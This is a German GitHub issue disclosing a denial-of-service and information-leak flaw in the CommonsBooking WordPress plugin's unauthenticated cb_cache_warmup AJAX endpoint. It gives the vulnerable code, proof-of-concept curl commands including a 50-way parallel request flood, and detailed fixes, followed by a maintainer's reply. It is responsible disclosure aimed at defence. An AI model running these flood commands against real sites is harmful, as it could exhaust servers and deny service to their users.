### ISSUE TITLE
DoS: Unauthentifizierter Cache-Warmup ohne Nonce-Verifikation (`cb_cache_warmup`)

### ISSUE THREAD

**Issue by rmoriz** [wielebenwir/commonsbooking#2281]
# DoS: Unauthentifizierter Cache-Warmup ohne Nonce-Verifikation (`cb_cache_warmup`)

| | |
|---|---|
| **Plugin** | CommonsBooking 2.11 |
| **Schweregrad** | Mittel (CVSS ca. 5.3 – AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) |
| **Typ** | CWE-862: Missing Authorization / CWE-352: CSRF (fehlende Nonce-Prüfung) |
| **Betroffene Datei** | `src/Service/Cache.php` (Funktion `warmupCache()`, Zeile 354) |
| **Registrierung** | `includes/Public.php`, Zeile 122–123 |
| **Auth erforderlich** | Nein (`wp_ajax_nopriv_`) |

---

## 1. Problembeschreibung

Der AJAX-Endpunkt `cb_cache_warmup` ist für **nicht angemeldete Benutzer** registriert
(`wp_ajax_nopriv_cb_cache_warmup`) und führt eine **rechenintensive Cache-Warmup-Routine**
aus. Obwohl das mitgelieferte JavaScript einen Nonce mitschickt
(`cb_ajax_cache_warmup.nonce`), wird dieser **serverseitig niemals verifiziert** –
es fehlt jeder Aufruf von `check_ajax_referer()` oder `wp_verify_nonce()`.

Ein Angreifer kann den Endpunkt beliebig oft und parallel aufrufen. Jeder Aufruf:

1. liest **alle veröffentlichten Seiten** mit CommonsBooking-Shortcodes aus der Datenbank,
2. parst deren Inhalte mit regulären Ausdrücken,
3. führt **jeden gefundenen Shortcode serverseitig aus** (Kalender-Rendering, DB-Abfragen,
   Datumsberechnungen über viele Tage/Items/Locations).

Auf einer produktiven Instanz mit vielen Items, Locations und Buchungsseiten verursacht
ein einzelner Request spürbare Datenbank- und CPU-Last. Durch parallele bzw. wiederholte
Requests lässt sich der Server in die Knie zwingen (**Denial of Service**).

### Zusatzproblem: Informationsleck bei `WP_DEBUG`

Ist `WP_DEBUG` aktiviert, sendet der Endpunkt im Fehlerfall die komplette
**Exception-Message inklusive Stack-Trace** als JSON zurück
(`$exception->getTraceAsString()`). Das verrät Angreifern interne Pfade,
Klassennamen und Code-Strukturen.

---

### 2.1 Registrierung (`includes/Public.php`, Zeilen 122–123)

```php
add_action( 'wp_ajax_cb_cache_warmup', array( \CommonsBooking\Plugin::class, 'warmupCache' ) );
add_action( 'wp_ajax_nopriv_cb_cache_warmup', array( \CommonsBooking\Plugin::class, 'warmupCache' ) );
//           ^^^^^^ unauthentifiziert erreichbar
```

Die Klasse `Plugin` bindet den Trait `CommonsBooking\Service\Cache` per `use Cache;` ein,
wodurch `Plugin::warmupCache()` auf `Cache::warmupCache()` zeigt.

### 2.2 JavaScript sendet Nonce – der ignoriert wird (`src/Service/Cache.php`, ~Zeile 340)

```php
wp_add_inline_script(
    'cache_warmup',
    '
    jQuery.ajax({
        url: cb_ajax_cache_warmup.ajax_url,
        method: "POST",
        data: {
            _ajax_nonce: cb_ajax_cache_warmup.nonce,   // <-- Nonce wird gesendet...
            action: "cb_cache_warmup"
        }
    });'
);
```

### 2.3 Handler ohne Nonce-Prüfung (`src/Service/Cache.php`, Zeile 354 ff.)

```php
public static function warmupCache() {
    try {
        global $wpdb;
        $table_posts = $wpdb->prefix . 'posts';

        // HIER FEHLT: check_ajax_referer( 'cb_cache_warmup' );

        // First get all pages with cb shortcodes
        $sql   = "SELECT post_content FROM $table_posts WHERE
          post_content LIKE '%[cb_%]%' AND
          post_type = 'page' AND
          post_status = 'publish'";
        $pages = $wpdb->get_results( $sql );

        $shortcodeNamesToCache = array_keys( self::$cbShortCodeFunctions );
        $regex = get_shortcode_regex( $shortcodeNamesToCache );

        // Alle Shortcodes aller Seiten extrahieren und AUSFÜHREN
        $shortCodeCalls = [];
        foreach ( $pages as $page ) {
            preg_match_all( "/$regex/", $page->post_content, $shortcodeMatches, PREG_SET_ORDER );
            foreach ( $shortcodeMatches as $match ) {
                // ... Shortcode-Aufrufe sammeln ...
            }
        }

        $shortCodeCalls = array_unique( $shortCodeCalls, SORT_REGULAR );
        self::runShortcodeCalls( $shortCodeCalls );   // <-- teuer: rendert alle Caches
    } catch ( \Exception $exception ) {
        if ( WP_DEBUG ) {
            wp_send_json( array(
                'success' => false,
                'error'   => true,
                // INFORMATIONSLECK: voller Stack-Trace an beliebige Aufrufer
                'message' => sprintf( 'cache warmup failed with message: %s, trace: %s',
                    $exception->getMessage(), $exception->getTraceAsString() ),
            ) );
        }
        // ...
    }
    wp_send_json( array( 'success' => true, 'error' => false,
        'message' => 'cache successfully warmed up' ) );
}
```

---

### 3.1 Einzelner Request (Funktionsnachweis)

```bash
# Kein Cookie, kein Nonce, kein Login nötig:
curl -s -X POST https://ZIEL/wp-admin/admin-ajax.php \
     -d "action=cb_cache_warmup"
```

**Erwartetes Ergebnis (verifiziert gegen lokale Testinstanz):**

```json
{"success":true,"error":false,"message":"cache successfully warmed up"}
```

Der Server hat die komplette Warmup-Routine ausgeführt – unauthentifiziert.

### 3.2 DoS-Demonstration (parallele Last)

```bash
# 50 parallele Warmup-Requests – jeder triggert DB-Scans + Shortcode-Rendering
seq 1 50 | xargs -P 50 -I{} \
  curl -s -o /dev/null -w "Req {}: %{http_code} in %{time_total}s\n" \
       -X POST https://ZIEL/wp-admin/admin-ajax.php \
       -d "action=cb_cache_warmup"
```

Auf einer Instanz mit vielen Buchungsseiten steigen DB-Connections und CPU-Last
mit jeder Welle; Apache/PHP-FPM-Worker werden gebunden.

> **Hinweis:** Der PoC wurde ausschließlich gegen die eigene lokale
> Docker-Testinstanz (`http://localhost:8080`) ausgeführt.

---

### 4.1 Minimal-Patch: Nonce serverseitig verifizieren

Der Nonce wird bereits im JS mitgeschickt – er muss nur noch geprüft werden.
Dazu muss der Nonce beim Enqueue mit einem **bekannten Action-Namen** erzeugt
und im Handler verifiziert werden:

```php
// Beim Registrieren der Script-Daten (wp_localize_script):
wp_localize_script( 'cache_warmup', 'cb_ajax_cache_warmup', array(
    'ajax_url' => admin_url( 'admin-ajax.php' ),
    'nonce'    => wp_create_nonce( 'cb_cache_warmup' ),   // Action-Name fixieren
) );

// Im Handler, als ALLERERSTE Zeile:
public static function warmupCache() {
    check_ajax_referer( 'cb_cache_warmup' );   // stirbt mit 403 bei ungültigem/fehlendem Nonce
    // ... Rest unverändert
}
```

**Wirkung:** Nur noch Requests mit gültigem, frischem Nonce (aus dem Frontend
der eigenen Seite) werden ausgeführt. Ein Nonce allein schützt aber nicht vor
Missbrauch durch eingeloggte Nutzer oder geleakte Nonces – siehe 4.2.

### 4.2 Besser: Capability-Check statt Unauthenticated-Endpoint

Der Warmup ist eine administrative Wartungsaufgabe. Konsequenter Fix:

```php
// includes/Public.php: nopriv-Registrierung ENTFERNEN
add_action( 'wp_ajax_cb_cache_warmup', array( \CommonsBooking\Plugin::class, 'warmupCache' ) );
// add_action( 'wp_ajax_nopriv_cb_cache_warmup', ... );  // <-- löschen

public static function warmupCache() {
    check_ajax_referer( 'cb_cache_warmup' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    // ...
}
```

Falls der Warmup für anonyme Besucher gedacht war (Cache vor dem ersten echten
Besuch füllen), sollte das stattdessen über einen **WP-Cron-Job** oder ein
serverseitiges Deployment-Skript (`wp eval`) erfolgen – nicht über einen
öffentlichen HTTP-Endpunkt.

### 4.3 Rate-Limiting / Selbstschutz im Handler

Zusätzliche Absicherung gegen wiederholte Ausführung:

```php
public static function warmupCache() {
    check_ajax_referer( 'cb_cache_warmup' );

    if ( get_transient( 'cb_cache_warmup_running' ) ) {
        wp_send_json_error( array( 'message' => 'warmup already running' ), 429 );
    }
    set_transient( 'cb_cache_warmup_running', 1, 5 * MINUTE_IN_SECONDS );
    // ... Warmup ...
    delete_transient( 'cb_cache_warmup_running' );
}
```

### 4.4 Stack-Trace-Leck schließen

Unabhängig vom DoS-Aspekt sollte der Debug-Zweig keine Traces an HTTP-Clients senden:

```php
} catch ( \Exception $exception ) {
    if ( WP_DEBUG && WP_DEBUG_LOG ) {
        error_log( 'CB cache warmup failed: ' . $exception->getMessage() );
        // Trace nur ins Server-Log, NIEMALS in die HTTP-Response
    }
    wp_send_json( array( 'success' => false, 'error' => true,
        'message' => 'cache warmup failed' ) );
}
```

### 4.5 Infrastruktur-seitige Mitigation (sofort, ohne Code-Änderung)

Bis ein Patch verfügbar ist, kann der Endpunkt auf Webserver-Ebene eingeschränkt werden:

```nginx
# nginx: cache_warmup für externe IPs sperren
location = /wp-admin/admin-ajax.php {
    if ($arg_action = cb_cache_warmup) { return 403; }
    # ... FastCGI-Config ...
}
```

```apache
# Apache (.htaccess): nur AJAX-Aktion cb_cache_warmup blockieren
RewriteCond %{QUERY_STRING} action=cb_cache_warmup [NC]
RewriteRule ^wp-admin/admin-ajax\.php$ - [F]
```

> **Achtung:** Post-Requests tragen `action` im Body, nicht im Query-String –
> zuverlässiger ist daher ein Application-Layer-Filter (MU-Plugin), siehe unten.

```php
<?php
// wp-content/mu-plugins/cb-block-warmup.php – temporärer Hotfix als MU-Plugin
add_action( 'init', function () {
    if ( defined( 'DOING_AJAX' ) && DOING_AJAX
         && isset( $_REQUEST['action'] )
         && $_REQUEST['action'] === 'cb_cache_warmup'
         && ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', 403 );
    }
}, 1 );
```

---

## 5. Zusammenfassung der Maßnahmen (Priorität)

| # | Maßnahme | Aufwand | Wirkung |
|---|----------|---------|---------|
| 1 | `check_ajax_referer()` im Handler | 1 Zeile | Nonce-Pflicht |
| 2 | `wp_ajax_nopriv_`-Registrierung entfernen + `current_user_can()` | klein | nur noch Admins |
| 3 | Transient-Lock gegen parallele Ausführung | klein | Anti-DoS |
| 4 | Stack-Trace nicht mehr ausgeben | klein | kein Info-Leak |
| 5 | MU-Plugin/Webserver-Regel als Sofortmaßnahme | klein | sofortiger Schutz |

**Comment by datengraben** [comment]
@rmoriz danke für die Meldung!

Das nicht prüfen des nonce ist m.E.n. ein no-brainer, danke.

@hansmorb Eher ein Problem des aktuellen Designs des Cache-Warmups, es ist nicht als administrative Wartungsaufgabe gedacht, sondern für alle User. Das hat @rmoriz ja bereits in seiner Meldung beschrieben.

Das heißt 4.2 aus den Lösungsansätzen wäre denke ich nicht praktikabel und es sollte ein WP-Cron-job sein.
